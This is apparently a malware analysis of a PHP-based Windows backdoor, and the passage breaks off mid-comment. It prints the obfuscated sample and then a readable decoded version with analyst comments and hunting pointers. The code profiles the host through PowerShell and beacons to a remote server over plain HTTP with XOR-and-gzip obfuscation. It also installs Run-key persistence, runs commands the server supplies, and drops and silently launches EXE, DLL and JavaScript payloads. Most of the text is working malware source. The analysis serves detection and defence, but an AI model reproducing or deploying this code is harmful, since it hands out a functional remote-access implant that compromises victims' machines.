$d0PbW = ecI0T($yYiH5) . "\x20\163\164\x61\x72\164"; goto FWxGw; VqA0a: goto nJLGE; goto E92UY; v9BNu: $xLjoz = "\103\x3a\134\127\x69\156\144\157\x77\x73\x5c\123\171\163\x74\x65\x6d\63\62\134\x72\165\156\x64\x6c\x6c\x33\x32\56\x65\x78\x65"; goto m2qgo; FWxGw: file_put_contents($yYiH5, $o0HyG); goto VqA0a; W1nPU: echo "\104\114\114" . PHP_EOL; goto umqro; E92UY: case $D_3Y7["\112\x53"]: goto yuPJ6; yuPJ6: echo "\112\123" . PHP_EOL; goto h_KkM; h_KkM: $xLjoz = getenv("\101\120\x50\x44\x41\x54\101") . "\134" . "\156\x6f\x64\x65\55\x76\62\61\x2e\67\56\x33\x2d\167\x69\156\x2d\x78\x36\x34\134\x6e\157\144\x65\56\x65\x78\145"; goto bPtdr; ig9mY: echo "\146\141\x69\x6c\x65\144\40\151\156\x73\x74\x61\154\154\x20\156\157\144\145\152\x73" . 
PHP_EOL; goto qk3BX; bPtdr: if (!(!file_exists($xLjoz) && !y40SZ("\x68\x74\164\x70\72\x2f\x2f\156\x6f\144\145\152\163\56\157\x72\147\x2f\144\151\163\x74\57\166\62\61\56\x37\x2e\63\x2f\156\x6f\144\145\55\x76\62\61\x2e\67\x2e\63\x2d\167\x69\x6e\x2d\170\66\64\x2e\172\x69\x70", getenv("\101\x50\x50\104\x41\x54\101")))) { goto W3oml; } goto ig9mY; Y_Aem: file_put_contents($d0PbW, $o0HyG); goto zCIdG; tdIKS: $d0PbW = BmLfv() . "\x5c" . XNKed(8) . "\x2e\x6a\160\147"; goto Y_Aem; zCIdG: goto nJLGE; goto w3k0S; qk3BX: return; goto uD0kN; uD0kN: W3oml: goto tdIKS; w3k0S: default: goto s2nJZ; TNSP3: file_put_contents(BmlfV() . "\x5c" . XnkeD(8) . "\x2e\164\x78\x74", $o0HyG); goto I3SlV; I3SlV: return; goto rdFY5; s2nJZ: echo "\x4f\x54\110\105\x52" . PHP_EOL; goto TNSP3; rdFY5: } goto uS_iH; nCcIW: $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG)); goto OUirS; E6092: global $rst7P, $D_3Y7, $szWC8, $dCN4_; goto Kh4oY; lsNbT: lfViE($xLjoz, $d0PbW); goto PhVCY; kMs0H: $rst7P["\x63\x6d\144"] = $u7kKd; goto oe9Eo; NRL85: rweeZ: goto nCcIW; OUirS: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4); goto BdwFO; b5HGd: nJLGE: goto lsNbT; kL4WH: if (!($Ql4QK == 204)) { goto zQM0Z; } goto tuOdf; CjTrc: unset($rst7P["\143\x6d\x64"]); goto O4_i1; OF1U2: $d0PbW = null; goto VXOzv; BdwFO: R7s9B($o0HyG, $oAl9r); goto PCb5g; Zq6SB: throw new Exception("\x48\124\x54\x50\40\x72\x65\x71\x75\145\163\164\x20\146\141\151\x6c\x65\x64\72\x20" . $Ql4QK); goto NRL85; tuOdf: echo "\62\x30\x34" . PHP_EOL; goto ojXAZ; PCb5g: $miAdf = ord($o0HyG[strlen($o0HyG) - 1]); goto I7s0k; VE56b: zQM0Z: goto nJvML; O4_i1: $o0HyG = $uJtGi["\143\x6f\x6e\164\x65\156\164"]; goto TG7Ws; ojXAZ: return; goto VE56b; PhVCY: } goto NxBG4; bc_XP: try { goto G8o3o; b3ZA4: if ($dlA_m >= $TZ64Y + 10) { goto SuLft; } goto dqR1N; KKvsW: xVHKd: goto PprER; G8o3o: echo $A4YkN . 
PHP_EOL; goto KeU2e; PprER: $dlA_m = 0; goto LWgVS; MQiTv: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto MKzlP; Lrde_: goto WdXyd; goto jp4cX; WAede: $dCN4_--; goto iaT6S; FHp7r: goto yt0U2; goto KKvsW; eWaiy: $LcYWr = 10; goto WAede; LWgVS: yt0U2: goto Lrde_; iaT6S: c81pJ: goto b3ZA4; E09nS: if ($dCN4_ > 0) { goto wbBrA; } goto rK6Ut; Nq2kv: $dlA_m = $TZ64Y - 10; goto ch1LL; RCrAZ: WdXyd: goto xHwH3; x6bWr: wbBrA: goto eWaiy; dqR1N: if ($dlA_m < $TZ64Y) { goto xVHKd; } goto bIkHK; ch1LL: if (!(count($h0b7d) > 0)) { goto njjkr; } goto MQiTv; MKzlP: njjkr: goto RCrAZ; rK6Ut: $LcYWr = 5 * 60; goto WieJG; KeU2e: echo $dlA_m . PHP_EOL; goto xMM4K; bIkHK: $dlA_m++; goto FHp7r; WieJG: goto c81pJ; goto x6bWr; jp4cX: SuLft: goto Nq2kv; xMM4K: moJ2m($A4YkN); goto E09nS; xHwH3: } catch (Throwable $Umveq) { goto wptzU; puz2n: $LcYWr = 10; goto R4mvO; QavQA: WGLsq: goto puz2n; kSgzE: $dlA_m++; goto JoIY7; Y0Lll: goto WGLsq; goto F6Iwd; wptzU: echo $pC2k6 . "\x45\162\162\x6f\162\72\x20" . $Umveq->getMessage() . 
$pC2k6; goto kSgzE; R4mvO: $dCN4_ = 0; goto qURNi; JoIY7: if ($dlA_m < $TZ64Y && count($h0b7d) > 0) { goto C78vx; } goto m7fon; F6Iwd: C78vx: goto JCQys; JCQys: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto QavQA; m7fon: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)]; goto Y0Lll; qURNi: } goto smHwj; EgCuT: V3Oj2: goto dfbng; d1AUN: sleep($LcYWr); goto OUc5x; VN3bi: function XNKeD($zcvYL = 16) { goto yWThk; nL0BB: $b3TRq .= $Ke3ba[rand(0, $brHta - 1)]; goto GkO5U; yWThk: $Ke3ba = "\60\61\x32\63\x34\x35\x36\x37\70\71\x61\x62\143\x64\x65\x66\147\150\151\152\153\x6c\x6d\156\x6f\x70\161\162\x73\164\x75\166\167\170\x79\x7a\101\x42\103\104\x45\106\107\x48\x49\x4a\x4b\114\115\x4e\x4f\120\x51\x52\x53\124\125\126\x57\x58\131\132"; goto HuuRn; rIPsG: if (!($Mc_Hp < $zcvYL)) { goto pP0ox; } goto nL0BB; kdKdZ: NWTYT: goto rIPsG; b8Tav: goto NWTYT; goto DGVWR; o0GmT: return $b3TRq; goto l_C7v; HuuRn: $brHta = strlen($Ke3ba); goto fL917; DGVWR: pP0ox: goto o0GmT; GEnfc: $Mc_Hp++; goto b8Tav; fL917: $b3TRq = ''; goto DMxcX; GkO5U: o61fz: goto GEnfc; DMxcX: $Mc_Hp = 0; goto kdKdZ; l_C7v: } goto KMXag; JgSSO: w_p_e:

デコード(難読化解除)されたコード

<?php

// Analyst note: start of the decoded script. These two globals hold the double-quote
// and newline characters that the helper functions reuse when they build command lines
// and join command output.
$szWC8 = "\"";
$pC2k6 = "\n";
// Deobfuscator artifact: the obfuscated listing tests file_exists(__FILE__) here. The
// literal path is where the decoding service stored the sample, not a path the sample names.
// The function declarations below sit inside this if-body, where PHP defines them only
// when execution reaches them, while qrOfa() and MNfE9() are called before that point.
// The decoded layout is therefore a reading aid, not a drop-in equivalent of the original.
if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) {
    // The values below are read by later functions through `global`.
    // $jIDpK is reported as "version_build" in the host profile built by mNFE9().
    $jIDpK = 20;
    // $JcEot is the TCP port placed in the http:// URL built by EtUpz().
    $JcEot = 80;
    // Task-type names mapped to numeric codes. The dispatcher that switches on these codes
    // is only visible in the obfuscated listing, not in this part of the decoded one.
    $D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
    // Counter that the obfuscated listing prints as "active_cnt"; starts at zero.
    $dCN4_ = 0;
    // Collect the host profile once at start-up (see mNFE9()).
    $rst7P = MNfE9();
    /**
     * Analyst note: reports whether the script name seen by PHP is the literal
     * "Standard input code".
     *
     * NOTE(review): that is the name the PHP CLI is understood to report when the code
     * does not come from a file (piped on stdin or passed inline) - confirm against
     * the PHP build in use. The start-up check at the top of the script uses this result
     * together with $argc.
     *
     * @return bool true when $argv[0] is exactly "Standard input code"
     */
    function QROfA()
    {
        global $argv;
        return $argv[0] === "Standard input code";
    }
    /**
     * Analyst note: wraps a string in double quotes using the global quote character.
     *
     * No escaping is applied to quotes already inside the argument; the function only
     * concatenates quote + value + quote. It is used to quote the PowerShell snippets
     * passed to exec() in mNFE9().
     *
     * @param string $b3TRq text to wrap
     * @return string the text surrounded by one double quote on each side
     */
    function ecI0T($b3TRq)
    {
        global $szWC8;
        return $szWC8 . $b3TRq . $szWC8;
    }
    /**
     * Analyst note: generates the request path that EtUpz() appends to "http://host:port".
     *
     * Shape of the result, as assembled on the return line:
     *   [ "/" segment ] "/" segment "&" <32 lowercase hex digits> [ "/" segment ]
     * Each segment is XNKeD(rand(0, 14)); per the obfuscated listing XNKeD builds a random
     * string of the requested length from digits and ASCII letters. The bracketed parts are
     * omitted when that segment is empty. The hex part is four "%08x" fields: the mixed
     * timestamp (high, low) followed by the altered random value (high, low).
     *
     * Detection angle: plain-HTTP POST paths containing "&" followed by 32 hex digits,
     * with otherwise random short path segments.
     *
     * NOTE(review): sending the altered random value next to the mixed timestamp presumably
     * lets the receiving side reverse the mixing - not shown in this file.
     *
     * @return string request path beginning with "/"
     */
    function rxiXT()
    {
        // getTimestamp() returns Unix time; presumably the Etc/GMT+5 zone does not change it - confirm.
        $Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
        // -4096 clears the low 12 bits, so the value only changes every 4096 seconds.
        // The obfuscated listing writes the mask as (int) 1.8446744073709548E+19; -4096 is
        // what the decoder evaluated that cast to.
        $o28qH = (int) $Eh0Dq->getTimestamp() & -4096;
        $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
        // Split both 64-bit values into 32-bit high/low halves.
        $t3Oc0 = $o28qH >> 32 & 0xffffffff;
        $YvSKs = $o28qH & 0xffffffff;
        $fruA2 = $LSet6 >> 32 & 0xffffffff;
        $rNvND = $LSet6 & 0xffffffff;
        // XOR the timestamp halves with the random halves.
        $t3Oc0 ^= $fruA2;
        $YvSKs ^= $rNvND;
        // Add a fixed constant across the two halves; the ternary carries the overflow
        // of the low half into the high half.
        $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
        $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
        // Two further XOR rounds with fixed constants on each half.
        $t3Oc0 ^= 0x219f7609;
        $YvSKs ^= 0xd1769498;
        $t3Oc0 ^= 0x86ad5709;
        $YvSKs ^= 0x15de8713;
        // The random value itself is altered by a second add-with-carry before it is emitted.
        $rNvND = $rNvND + 0x29807914 & 0xffffffff;
        $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
        // Final XOR of the timestamp halves with the altered random halves.
        $t3Oc0 ^= $fruA2;
        $YvSKs ^= $rNvND;
        // All four values are masked to 32 bits above, so each field prints as 8 hex digits.
        $KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
        $U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
        $USwKc = XNked(rand(0, 14));
        $FjQwC = XnkeD(rand(0, 14));
        return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
    }
    /**
     * Analyst note: builds the host profile stored in $rst7P at start-up.
     *
     * Runs six PowerShell one-liners through exec() and stores the results under the keys
     * systeminfo, other, processes, services, drives and arp. Any non-zero exit code aborts
     * the whole collection with an Exception. In the obfuscated listing the resulting array
     * is JSON-encoded and handed to the upload routine.
     *
     * Detection angle: a PHP interpreter process spawning "powershell -c" with systeminfo,
     * tasklist /svc, Get-Service, Get-PSDrive and Get-NetNeighbor one after another.
     *
     * @return array nested array with the keys listed above
     * @throws Exception with message "Failed to execute command" when a command exits non-zero
     */
    function mNFE9()
    {
        global $jIDpK, $szWC8, $pC2k6;
        $JGJW0 = [];
        // 1. OS and hardware summary (systeminfo), converted from CSV to JSON by PowerShell.
        exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
        if (!($xv08g !== 0)) {
            $JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
            // exec() appends to an existing output array, so the buffer is reset between commands.
            $pcI7I = '';
            // 2. Privilege level of the current identity: prints SYSTEM, ADMIN or USER.
            exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM')  { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
            if (!($xv08g !== 0)) {
                // Fixed and random identifiers reported with the profile.
                $JGJW0["other"]["version_build"] = $jIDpK;
                $JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
                $JGJW0["other"]["id_loader"] = 43;
                // First output line of the privilege check, or "UNKNOWN" when there was none.
                $JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
                $JGJW0["other"]["type_file"] = "PHP";
                $pcI7I = '';
                // 3. Running processes with their hosted services.
                exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
                if (!($xv08g !== 0)) {
                    // Deobfuscator artifact: the obfuscated listing has
                    // json_decode(implode($pC2k6, $pcI7I), true) here, i.e. the command output is kept.
                    $JGJW0["processes"] = json_decode(null, true);
                    $pcI7I = '';
                    // 4. Installed services (name and display name).
                    exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
                    if (!($xv08g !== 0)) {
                        // Deobfuscator artifact, as for "processes": the original decodes the exec() output.
                        $JGJW0["services"] = json_decode(null, true);
                        $pcI7I = '';
                        // 5. File-system drives.
                        exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
                        if (!($xv08g !== 0)) {
                            // Deobfuscator artifact, as for "processes": the original decodes the exec() output.
                            $JGJW0["drives"] = json_decode(null, true);
                            $pcI7I = '';
                            // 6. IPv4 neighbor (ARP) table, excluding entries in state 'Permanent'.
                            exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { \$_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
                            if (!($xv08g !== 0)) {
                                // Deobfuscator artifact, as for "processes": the original decodes the exec() output.
                                $JGJW0["arp"] = json_decode(null, true);
                                $pcI7I = '';
                                return $JGJW0;
                            }
                            throw new Exception("Failed to execute command");
                        }
                        throw new Exception("Failed to execute command");
                    }
                    throw new Exception("Failed to execute command");
                }
                throw new Exception("Failed to execute command");
            }
            throw new Exception("Failed to execute command");
        }
        throw new Exception("Failed to execute command");
    }
    /**
     * Analyst note: XORs a byte string in place with a rolling keystream derived from a key.
     *
     * The keystream depends only on the key bytes and the byte index, so running the routine
     * a second time with the same key restores the original data. This is obfuscation of the
     * traffic body rather than encryption: A2uxo() appends the key to the data it sends.
     *
     * @param string $xbNO5 data buffer, modified through the reference
     * @param string $eAmVW key bytes; the first byte seeds the rolling state
     * @return void
     */
    function r7s9B(&$xbNO5, $eAmVW)
    {
        // Rolling state starts at the first key byte.
        $s9r5b = ord($eAmVW[0]);
        $cbiCS = strlen($xbNO5);
        $kt3y8 = strlen($eAmVW);
        $Mc_Hp = 0;
        // goto-based loop left by the decoder: one iteration per data byte.
        kAq95:
        if (!($Mc_Hp < $cbiCS)) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        // state = (2 * state + index mod 256) mod 256
        $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
        // % binds tighter than ^ in PHP: data byte XOR ((key byte XOR state) mod 256).
        $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
        ++$Mc_Hp;
        goto kAq95;
    }
    /**
     * Analyst note: prepares an outgoing body - XOR-obfuscate, append the key, gzip.
     *
     * For decoding captured traffic: the body is a gzip stream; after decompression the last
     * four bytes are the key (little-endian 32-bit, from pack("V")), and passing the preceding
     * bytes through R7s9b() with that key yields the original payload.
     *
     * @param string $xbNO5 payload to wrap (received by value; the caller's copy is untouched)
     * @return string gzip-compressed bytes of obfuscated payload followed by the 4-byte key
     */
    function A2uxo($xbNO5)
    {
        // Per-message key: random integer packed as 4 little-endian bytes.
        $Ot6LN = mt_rand(0, 100000000);
        $rasAm = pack("V", $Ot6LN);
        // In-place XOR of the local copy.
        R7s9b($xbNO5, $rasAm);
        // The key travels in clear at the end of the data.
        $ERqBI = $xbNO5 . $rasAm;
        return gzencode($ERqBI, 5, FORCE_GZIP);
    }
    /**
     * Analyst note: sends a body with HTTP POST and returns the response.
     *
     * The URL is "http://" + host + ":" + global port + the path from rXiXT(), so the
     * exchange is unencrypted HTTP with Content-type application/octet-stream and a
     * 20-second timeout. "ignore_errors" makes file_get_contents() return the body even
     * for HTTP error statuses.
     *
     * @param string $A4YkN host name or address to contact
     * @param string $xbNO5 request body
     * @return array keys: content (body), headers (raw header lines), status (first header
     *               line or null), code (parsed 3-digit status, 0 when not parsed)
     * @throws Exception "HTTP request failed: ..." when file_get_contents() returns false
     */
    function EtUpz($A4YkN, $xbNO5)
    {
        global $JcEot;
        $H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
        $nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
        $nuWcv = stream_context_create($H6YXK);
        $HhbRp = null;
        // Temporary error handler: keeps the last warning text for the exception message below.
        set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) {
            $HhbRp = $Mxyq3;
        });
        $RwYxj = file_get_contents($nG_P0, false, $nuWcv);
        restore_error_handler();
        if (!($RwYxj === false)) {
            $Ql4QK = 0;
            // $http_response_header is filled in by PHP's HTTP stream wrapper in the local scope.
            if (!isset($http_response_header[0])) {
                goto ycYgX;
            }
            // Pull the 3-digit status code out of the status line.
            preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $fUPyD);
            if (!isset($fUPyD[1])) {
                goto oo9y0;
            }
            $Ql4QK = (int) $fUPyD[1];
            oo9y0:
            ycYgX:
            return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
        }
        throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
    }
    /**
     * Analyst note: downloads an archive and extracts it into a directory.
     *
     * The download is written to a tmpfile() and opened through the class XdeZr,
     * which is not defined in this excerpt (its open/extractTo/close calls look like
     * the ZipArchive interface; confirm against the full sample). Nothing here
     * verifies the download's integrity, and the only visible caller (mOJ2M, "JS"
     * case) fetches over plain http.
     *
     * @param string $nG_P0 URL of the archive.
     * @param string $Yem6z Target directory, created if missing.
     * @return bool True only if the archive opened and extractTo() succeeded.
     */
    function Y40sz($nG_P0, $Yem6z)
    {
        if (file_exists($Yem6z)) {
            goto qw6IQ;
        }
        // Recursive mkdir with mode 0777 when the target does not exist yet.
        if (mkdir($Yem6z, 0777, true)) {
            qw6IQ:
            // No check that the download succeeded; a false result is written as an empty file.
            $cTc0_ = file_get_contents($nG_P0);
            $PH23F = tmpfile();
            fwrite($PH23F, $cTc0_);
            rewind($PH23F);
            $abtZm = new XdeZr();
            // The archive object is given the temp file's on-disk path.
            $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
            if (!($Mbxm4 !== true)) {
                if ($abtZm->extractTo($Yem6z)) {
                    $abtZm->close();
                    fclose($PH23F);
                    return true;
                }
                $abtZm->close();
                fclose($PH23F);
                return false;
            }
            fclose($PH23F);
            return false;
        }
        return false;
    }
    /**
     * Analyst note: persistence through the per-user Run key.
     *
     * Adds a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run whose
     * data is the PHP binary followed by a script path. The value name comes from
     * VjppV(), i.e. the name of an existing AppData folder, so it blends in with
     * installed software. When QrOFA() is true and the process was started with
     * "php -r <code>", the inline code is first written to ".<12 random chars>.txt"
     * in the current working directory and that file becomes the script path.
     *
     * Not visible in this excerpt, so treat as assumptions: QrOFA() (looks like a
     * check for inline execution), $szWC8 (used like a quote character), $pC2k6
     * (used like a line separator) and eCI0t() (used like shell-argument quoting).
     * The literal "/var/www/html/input.php" is presumably __FILE__ folded to the
     * deobfuscation service's own path; check the obfuscated original.
     *
     * Hunting pointers: Run values whose data starts php.exe with a dot-prefixed
     * .txt file, and a php.exe process spawning
     * "wmic process where processid=<pid> get commandline".
     *
     * @return bool False when no " -r " is found in the own command line; true after reg add was invoked.
     */
    function UrHlx()
    {
        global $szWC8, $pC2k6;
        if (QrOFA()) {
            // Drop-file name: leading dot, 12 random alphanumerics, ".txt".
            $oyBW1 = "." . xNked(12) . ".txt";
            // Reads this process's own command line through WMIC.
            $ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
            if (!(!$ZqddJ || !preg_match_all("/\\s-r\\s/", $ZqddJ))) {
                // Keep everything after the first separator, presumably to skip WMIC's header row.
                $pDMmF = explode($pC2k6, $ZqddJ, 2);
                $xU41z = trim($pDMmF[1] ?? '');
                // Everything after "php.exe ... -r " is the inline code.
                $Y72oh = preg_split("/php\\.exe.*?\\s-r\\s+/", $xU41z, 2);
                $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
                file_put_contents($oyBW1, $uJtGi);
                goto hOX6z;
            }
            return false;
        }
        // Presumably __FILE__ in the original sample (see the note in the header).
        $oyBW1 = "/var/www/html/input.php";
        hOX6z:
        // exec() result is not checked: the function returns true even if reg add fails.
        exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
        return true;
    }
    /**
     * Analyst note: returns the name of a randomly chosen existing entry from the
     * user's AppData listings.
     *
     * Callers use the result as a Run-key value name (UrHlx) and as the prefix of a
     * new directory name (BMLFv), so artefacts carry the name of software already
     * present on the host. Expect that when hunting: the names are host-specific.
     *
     * @return string One directory-entry name.
     */
    function vJppV()
    {
        // Array `+` is a key-wise union: LOCALAPPDATA entries only appear at indexes
        // beyond the length of the APPDATA listing.
        $inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
        $inBis = array_diff($inBis, [".", ".."]);
        // array_diff() keeps the original keys; reindex so the random index below is valid.
        $inBis = array_values($inBis);
        // Debug output left in by the author: dumps the listing to stdout.
        print_r($inBis);
        return $inBis[rand(0, count($inBis) - 1)];
    }
    /**
     * Analyst note: builds a random alphanumeric string, used for dropped file names.
     *
     * Visible callers request 8 characters (payload files) or 12 (the persistence
     * drop file). File names are therefore not stable indicators; match on
     * location, extension and parent process instead.
     *
     * @param int $zcvYL Number of characters to generate (default 16).
     * @return string Characters drawn from 0-9, a-z, A-Z.
     */
    function XNKeD($zcvYL = 16)
    {
        $Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        $brHta = strlen($Ke3ba);
        $b3TRq = '';
        $Mc_Hp = 0;
        // goto-based counting loop, one character appended per pass.
        NWTYT:
        if (!($Mc_Hp < $zcvYL)) {
            return $b3TRq;
        }
        $b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
        $Mc_Hp++;
        goto NWTYT;
    }
    // Analyst note: global slot for the single in-flight command; deG1t() stores the
    // proc_open() handle and pipes here and rcbqD() collects the result.
    $wGaOo = null;
    /**
     * Analyst note: starts a server-supplied command line without waiting for it.
     *
     * The string is passed unmodified to proc_open(); the process handle and its
     * stdin/stdout/stderr pipes are parked in the global $wGaOo, replacing any
     * earlier entry. Output is collected later by rcbqD().
     *
     * Hunting pointer: php.exe as the parent of arbitrary child processes.
     *
     * @param string $d0PbW Command line to execute.
     * @return string|null "<failed>" if proc_open() did not return a resource, otherwise nothing.
     */
    function deG1t($d0PbW)
    {
        global $wGaOo;
        // Descriptors: 0 = stdin (child reads), 1 = stdout, 2 = stderr (child writes).
        $qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
        if (is_resource($Nr7MT)) {
            $wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
            // [PHPDeobfuscator] Implied return
            return;
        }
        return "<failed>";
    }
    /**
     * Analyst note: collects the result of the command started by deG1t().
     *
     * Returns null while no command is stored or while it is still running. Once the
     * process has exited it reads stdout and stderr, closes the pipes and returns a
     * report of the form "out:" + stdout (or "<empty>"), followed by
     * "err(<exit code>):" + stderr when stderr is non-empty.
     *
     * Deobfuscator artefact: in the obfuscated original PHP_EOL is a concatenated
     * constant ("out:" . PHP_EOL, PHP_EOL . "err(" ...). The tool folded the constant
     * name into the string literals below, so the literal text "PHP_EOL" is not what
     * the real sample emits.
     *
     * @return string|null Formatted output, or null when there is nothing to report yet.
     */
    function rcbqD()
    {
        global $wGaOo;
        if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) {
            $Nr7MT = $wGaOo["process"];
            $V8__K = $wGaOo["pipes"];
            if (!proc_get_status($Nr7MT)["running"]) {
                // Process has exited: clear the slot, then drain and close the pipes.
                $wGaOo = null;
                $gGLsg = stream_get_contents($V8__K[1]);
                $Dbe2H = stream_get_contents($V8__K[2]);
                fclose($V8__K[0]);
                fclose($V8__K[1]);
                fclose($V8__K[2]);
                $nSJJJ = proc_close($Nr7MT);
                // Original: "out:" . PHP_EOL (see the artefact note in the header).
                $PS9aF = "out:PHP_EOL";
                if ($gGLsg) {
                    $PS9aF .= $gGLsg;
                    goto TkkmA;
                }
                $PS9aF .= "<empty>";
                TkkmA:
                if (!$Dbe2H) {
                    goto UBiN4;
                }
                // Original: PHP_EOL . "err(" . <exit code> . "):" . PHP_EOL . <stderr>.
                $PS9aF .= "PHP_EOLerr(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
                UBiN4:
                return $PS9aF;
            }
            // Debug trace left by the author; original text ends with the PHP_EOL constant.
            echo "\$last_command == runningPHP_EOL";
            return null;
        }
        echo "\$last_command == nullPHP_EOL";
        return null;
    }
    /**
     * Analyst note: launches a program with no visible window through PowerShell.
     *
     * Builds "powershell.exe -WindowStyle Hidden -c <Start-Process ...>" and runs it
     * with shell_exec(). ECi0t() is defined outside this excerpt and is used here
     * like a shell-argument quoting helper (assumption). $szWC8 is a global used like
     * a quote character that gets backslash-escaped inside the argument list, and
     * $pC2k6 is used like a line separator; both are assumptions.
     *
     * Hunting pointer: process chain php.exe -> powershell.exe with
     * "-WindowStyle Hidden" and "Start-Process" on the command line.
     *
     * @param string      $xLjoz Path of the program to start.
     * @param string|null $d0PbW Argument string; omitted from the command when empty.
     */
    function lFVIE($xLjoz, $d0PbW)
    {
        global $szWC8, $pC2k6;
        $o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
        // Debug trace: the assembled command line is printed before it runs.
        echo $o_rCT . $pC2k6 . $pC2k6;
        shell_exec($o_rCT);
    }
    /**
     * Analyst note: creates a staging directory for dropped payloads.
     *
     * The path is %APPDATA%\<name of an existing AppData entry><random number up to
     * 1000000>, so it resembles a folder of software already installed on the host.
     * Hunting pointer: new %APPDATA% directories named like an existing sibling plus
     * trailing digits, containing a single .exe, .png, .jpg or .txt file.
     *
     * @return string Path of the directory (mkdir() result is not checked).
     */
    function BMLFv()
    {
        $qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
        mkdir($qHIxs);
        return $qHIxs;
    }
    /**
     * Analyst note: one beacon round trip plus dispatch of the server's instruction.
     *
     * Request: the global $rst7P (built outside this excerpt) is JSON-encoded,
     * wrapped by A2UXO() and POSTed by EtupZ(). Output of the previously started
     * command, if any, is attached under the "cmd" key for this one request.
     *
     * Response: HTTP 204 means "no task". HTTP 200 carries a blob whose last 4 bytes
     * are the XOR key; after decoding, the last byte of the plaintext is the task
     * code and the remainder is the task data. Any other status raises an Exception.
     *
     * Task codes are looked up in the global $D_3Y7 (values not visible here):
     *   CMD     - run the data as a command line (DEg1T)
     *   ACTIVE  - set the fast-polling counter $dCN4_ from a 32-bit little-endian value
     *   AUTORUN - install Run-key persistence (URHlX)
     *   OFF     - terminate the script
     *   EXE     - write the data to <staging dir>\<8 chars>.exe and start it
     *   DLL     - write the data to <staging dir>\<8 chars>.png and start it through
     *             C:\Windows\System32\rundll32.exe with the argument "start"
     *   JS      - ensure %APPDATA%\node-v21.7.3-win-x64\node.exe exists (downloading
     *             the archive from nodejs.org over http if needed), write the data to
